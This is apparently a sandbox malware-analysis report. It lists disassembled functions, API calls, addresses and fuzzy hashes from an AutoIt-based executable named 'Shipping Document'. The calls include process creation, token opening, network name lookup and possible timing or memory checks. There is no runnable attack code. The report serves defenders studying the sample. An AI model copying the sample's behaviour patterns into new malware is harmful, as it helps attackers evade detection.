Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: a0caaa9b8d05030f6772e57598152ba597d63e8252a22674c810613c76ac8adf
Instruction ID: 164a0fec89ab1b781bf9813710f423aba1b5515f3a6b69abf6855a707c4d03f8
Opcode Fuzzy Hash: a0caaa9b8d05030f6772e57598152ba597d63e8252a22674c810613c76ac8adf
Instruction Fuzzy Hash: D111AB75D012387AD7305AA99C8DFABBBBCEF45760F1045D6F908D7180D6744E808BA4

Function 0103667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01027B20,?,?,00000000), ref: 00FC5B8C
Part of subcall function 00FC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01027B20,?,?,00000000,?,?), ref: 00FC5BB0

gethostbyname.WSOCK32(?), ref: 010366AC
WSAGetLastError.WSOCK32(00000000), ref: 010366B7
_memmove.LIBCMT ref: 010366E4
inet_ntoa.WSOCK32(?), ref: 010366EF

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 443526cf5721a66ad90c8c569a1f4580e1a3e261ec68cc8dbb301385c741eb1f
Instruction ID: 1b770fec8a4cc0543ecc33aca47efaea4f534c30a683a22577b8195c12fa5221
Opcode Fuzzy Hash: 443526cf5721a66ad90c8c569a1f4580e1a3e261ec68cc8dbb301385c741eb1f
Instruction Fuzzy Hash: 2D11907650010AAFCB00EBA5DE86DEEB7B8AF44710B044069F502A7161DF79AF04DB61

Function 01019023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 01019043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 01019055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0101906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 01019086

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4a4bdc6a944f99576a471ddac9556cc2b6a7db6d8117d4f2d3feb1c2c76f9937
Instruction ID: 1149ce3657dc50bf536deb09d092cd5f8081c2f79720f2de91d6d8287237e655
Opcode Fuzzy Hash: 4a4bdc6a944f99576a471ddac9556cc2b6a7db6d8117d4f2d3feb1c2c76f9937
Instruction Fuzzy Hash: 36115A79901219FFEB11DFA9C984EADBBB8FB48350F204095FA44B7294D6726E10DB90

Function 00FC1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623

DefDlgProcW.USER32(?,00000020,?), ref: 00FC12D8
GetClientRect.USER32(?,?), ref: 00FFB84B
GetCursorPos.USER32(?), ref: 00FFB855
ScreenToClient.USER32(?,?), ref: 00FFB860

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: a03937b596406e8711b760f167f3da64c8c13cbff6b2563b8aef45b3ec094925
Instruction ID: 41749e912415047e02fe89875a48f2afddcc1c74df54e00a469d040f32282bab
Opcode Fuzzy Hash: a03937b596406e8711b760f167f3da64c8c13cbff6b2563b8aef45b3ec094925
Instruction Fuzzy Hash: 72112B7990001AEBDB10EFA8DA86EEE77B8FB06301F000459E951E7141C735BA61ABA5

Function 01021652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,010201FD,?,01021250,?,00008000), ref: 0102166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,010201FD,?,01021250,?,00008000), ref: 01021694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,010201FD,?,01021250,?,00008000), ref: 0102169E
Sleep.KERNEL32(?,?,?,?,?,?,?,010201FD,?,01021250,?,00008000), ref: 010216D1

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 16f6e6f700a6475e6212cf7a7852d82660385fcc52f066216be97e8e57135f93
Instruction ID: 3e966406413472210e6c2029d07f8dcb3f461abdf2cf824afa296b508c014f1e
Opcode Fuzzy Hash: 16f6e6f700a6475e6212cf7a7852d82660385fcc52f066216be97e8e57135f93
Instruction Fuzzy Hash: 25113C71D0052DE7CF20AFA9E988AEEBF78FF0D751F054095E980B6244CB355560CB96

Function 00FF7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00FF722B

Part of subcall function 00FF7912: __fltout2.LIBCMT ref: 00FF793B

__cftog_l.LIBCMT ref: 00FF7251
__cftoe_l.LIBCMT ref: 00FF7283

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 6cd2e390a946091f402a1197efef3675b6d33d83954d3cdd7525b065202c31b5
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: AD014C3644824EBBCF126E84DC018EEBF62BF69351B588615FB1858031D237C9B1BF81

Function 0104B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0104B59E
ScreenToClient.USER32(?,?), ref: 0104B5B6
ScreenToClient.USER32(?,?), ref: 0104B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0104B5F5

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 6931e7cb0faca919299a236abe004a37ab2673082c46ab7a544707c1253d0c9e
Instruction ID: ed483cf32da9dd4faa6edc280e54afb22fcf3f00aa183ea4f7a5ae4a88e7782c
Opcode Fuzzy Hash: 6931e7cb0faca919299a236abe004a37ab2673082c46ab7a544707c1253d0c9e
Instruction Fuzzy Hash: 861163B9D0020AEFDB51DFA9C584AEEFBF9FB08310F108166E954E3210D735AA518F90

Function 0104B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0104B8FE
_memset.LIBCMT ref: 0104B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01087F20,01087F64), ref: 0104B93C
CloseHandle.KERNEL32 ref: 0104B94E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 89d6c6a9f415ead19b6cb2d6b41cfcdfba7bf831202ad2e048cd23c138b63cfb
Instruction ID: fb0459335d5f1f24e8e031d1257a6954f7106f3176d041ae98ad0f87dd48eb07
Opcode Fuzzy Hash: 89d6c6a9f415ead19b6cb2d6b41cfcdfba7bf831202ad2e048cd23c138b63cfb
Instruction Fuzzy Hash: 49F082F2544310BBF2202666AC49FBF3A9CEB08758F104060BBC8D618FD77A4D0087A8

Function 01026E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 01026E88

Part of subcall function 0102794E: _memset.LIBCMT ref: 01027983

_memmove.LIBCMT ref: 01026EAB
_memset.LIBCMT ref: 01026EB8
LeaveCriticalSection.KERNEL32(?), ref: 01026EC8

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 7b6b3c89a90bc4ab35b990e09b0d22ad45ccaa0deda3cca9aae26ca04482692a
Instruction ID: b7c40778f4fd2e9de135908e063e7c029bf89759cb4d2638e8aab281056aa324
Opcode Fuzzy Hash: 7b6b3c89a90bc4ab35b990e09b0d22ad45ccaa0deda3cca9aae26ca04482692a
Instruction Fuzzy Hash: 28F05E7A200210ABCF116F55DD84A8ABB2AEF45320B08C055FE089F21AC736A911DBB4

Function 0104C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00FC12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FC134D
Part of subcall function 00FC12F3: SelectObject.GDI32(?,00000000), ref: 00FC135C
Part of subcall function 00FC12F3: BeginPath.GDI32(?), ref: 00FC1373
Part of subcall function 00FC12F3: SelectObject.GDI32(?,00000000), ref: 00FC139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0104C030
LineTo.GDI32(00000000,?,?), ref: 0104C03D
EndPath.GDI32(00000000), ref: 0104C04D
StrokePath.GDI32(00000000), ref: 0104C05B

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 1dc72ed73465ca6d8ae1e50339241e28fbe74030c6d551a26753d9913e35dafd
Instruction ID: 5eebb8efa46d697dd1032382ebb2bd9618206b430c3e33be1a3d0998ba81c9a7
Opcode Fuzzy Hash: 1dc72ed73465ca6d8ae1e50339241e28fbe74030c6d551a26753d9913e35dafd
Instruction Fuzzy Hash: 11F0BE7500525ABBEB326F58ED0EFCE3F98AF06310F044100FA91210D587BA0160CFA5

Function 0101A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0101A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 0101A3AC
GetCurrentThreadId.KERNEL32 ref: 0101A3B3
AttachThreadInput.USER32(00000000), ref: 0101A3BA

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 387c45cc7dede41937c90e6d111b74ef644bc95ab8a4c18127ce200512de7584
Instruction ID: f78bf9f569e0fdfa3cb041f493c087578452f4627ac6d1eb440e2c2825b4a91d
Opcode Fuzzy Hash: 387c45cc7dede41937c90e6d111b74ef644bc95ab8a4c18127ce200512de7584
Instruction Fuzzy Hash: 7CE03071241268BBEB211A65DD4CFD77F5CEF167A1F008015F989D6054C6BA8540C7A0

Function 00FC2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00FC2231
SetTextColor.GDI32(?,000000FF), ref: 00FC223B
SetBkMode.GDI32(?,00000001), ref: 00FC2250
GetStockObject.GDI32(00000005), ref: 00FC2258
GetWindowDC.USER32(?,00000000), ref: 00FFC0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 00FFC0E0
GetPixel.GDI32(00000000,?,00000000), ref: 00FFC0F9
GetPixel.GDI32(00000000,00000000,?), ref: 00FFC112
GetPixel.GDI32(00000000,?,?), ref: 00FFC132
ReleaseDC.USER32(?,00000000), ref: 00FFC13D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 57c3bef8b355d5287d89fa26ea333ca56b78e01e75d55ab35126aa2c1a6a263d
Instruction ID: 8aebf47b0d08c6cf6d876fc6331a285e4c115a99f2b109036f339f6ec24618c1
Opcode Fuzzy Hash: 57c3bef8b355d5287d89fa26ea333ca56b78e01e75d55ab35126aa2c1a6a263d
Instruction Fuzzy Hash: A0E06576500149ABEB315F68FA4D7D83B10EB06332F008356FBA9580F587764590DB51

Function 01018C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 01018C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,0101882E), ref: 01018C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0101882E), ref: 01018C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,0101882E), ref: 01018C7E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: e89a513c7b51361a5fc1446841431d077ca715323376bb57773a7aeabb394687
Instruction ID: 093c894f67dcd02a0faa94ef46e66411d479e25370ad56531d0775d769795f2a
Opcode Fuzzy Hash: e89a513c7b51361a5fc1446841431d077ca715323376bb57773a7aeabb394687
Instruction Fuzzy Hash: 58E086BA642212EBD7705FBC6F4CB573BACEF41792F048858B6C5C9048D63D8041CB51

Function 01002187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 01002187
GetDC.USER32(00000000), ref: 01002191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 010021B1
ReleaseDC.USER32(?), ref: 010021D2

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 870479243c7edc7ead0b63df9bbf9d35ab516f3aba21b51e9fdcc0bd1341b689
Instruction ID: e1cbb5758ecb8fe7dcb63e556d0967538e9fd365f42fb3d51486e4fc7bb8c4b4
Opcode Fuzzy Hash: 870479243c7edc7ead0b63df9bbf9d35ab516f3aba21b51e9fdcc0bd1341b689
Instruction Fuzzy Hash: 95E0E5B9800606EFDB11AFB5DA49B9E7BB1EB5C350F118409FD9A97250CB7D8141AF40

Function 0100219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0100219B
GetDC.USER32(00000000), ref: 010021A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 010021B1
ReleaseDC.USER32(?), ref: 010021D2

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: da4991181ce18a1e0af6708020f2d2a8314b1833b7bb415e6c47579684798a89
Instruction ID: 05d1e39e82520574ed549af86d5e3e6ff4da8854e8bee4b383c9a6ecf19d76b1
Opcode Fuzzy Hash: da4991181ce18a1e0af6708020f2d2a8314b1833b7bb415e6c47579684798a89
Instruction Fuzzy Hash: A5E0E5B9800206AFCB21AFB5CA49A9E7BA1EB4C310F118009FD9A97210CB7D9141AF40

Function 0101B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0101B981

Strings

Container, xrefs: 0101B8FE
AutoIt3GUI, xrefs: 0101B8F9

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 0ae7de0064dd49e4a4f907a3bed3d3470ad29100931fa030338dbc8febf59a31
Instruction ID: 0efb4f893902c2360365288366f55c66b1dddbcb74642a4ee59cbdca43b258dc
Opcode Fuzzy Hash: 0ae7de0064dd49e4a4f907a3bed3d3470ad29100931fa030338dbc8febf59a31
Instruction Fuzzy Hash: F8915B716002029FDB64DF68C884A6ABBF5FF48710F1485ADF98ACB295DB75E841CB50

Function 0102B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00FDFEC6: _wcscpy.LIBCMT ref: 00FDFEE9

Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C

__wcsnicmp.LIBCMT ref: 0102B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0102B361

Strings

LPT, xrefs: 0102B292

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: e15b79fd7b4c8cf4e65e90622f13f6540b35490bc5e5ecc1e449a16ce8fb880b
Instruction ID: 4ab6d482dcca87941766afd58e1aca988fad6065a4ceaeeda45c771a2e5c75a7
Opcode Fuzzy Hash: e15b79fd7b4c8cf4e65e90622f13f6540b35490bc5e5ecc1e449a16ce8fb880b
Instruction Fuzzy Hash: E7618375A04225EFCB14DF98C985EAEB7F4EF08710F05809AF986AB351DB74AE44CB50

Function 00FD2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00FD2AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00FD2AE1

Strings

@, xrefs: 00FD2AD5

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: c8fa42e3e10dba1ce9780456913fadec896166a600ef4fdcb688168f22c36739
Instruction ID: aef8466030424f97bab3f4a23bc005cdd4d352d234bb11aa9d1e0d7876479262
Opcode Fuzzy Hash: c8fa42e3e10dba1ce9780456913fadec896166a600ef4fdcb688168f22c36739
Instruction Fuzzy Hash: 565168714187459BD320AF11DD8AFABBBE8FF84310F42884DF1D981095DB798428DB26

